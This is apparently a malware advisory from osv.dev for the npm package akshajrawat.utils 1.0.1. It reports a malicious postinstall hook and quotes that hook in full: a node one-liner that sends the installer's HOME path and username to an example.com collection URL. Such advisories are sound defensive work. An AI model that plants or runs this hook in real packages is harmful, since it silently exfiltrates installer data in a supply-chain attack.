npm

akshajrawat.utils @1.0.1

Vulnerability report · Last retrieved from osv.dev July 15, 2026 at 3:50 AM UTC

Malicious

OSV ID

MAL-2026-10558

Ecosystem

npm

Summary

The package's package.json declares a postinstall lifecycle hook that runs automatically on npm install : node -e "require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)" . On every install, this issues an unconditional HTTPS GET to https://example.com/collect with the installer's $HOME path and $USERNAME embedded as query-string parameters. This is the canonical supply-chain exfiltration shape: lifecycle-triggered, unconditional, undocumented outbound transmission of installer-side identifiers. While example.com and the package description suggest the package may be a proof-of-concept or research artifact, the structural behavior would harm any installer who runs npm install against it, and the same scaffold trivially redirects to an attacker-controlled host.

Source: amazon-inspector (105157af41712b64f8b36ec1cb01e28958e4ad828a0c08d0979a1f6e22d1f13d)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.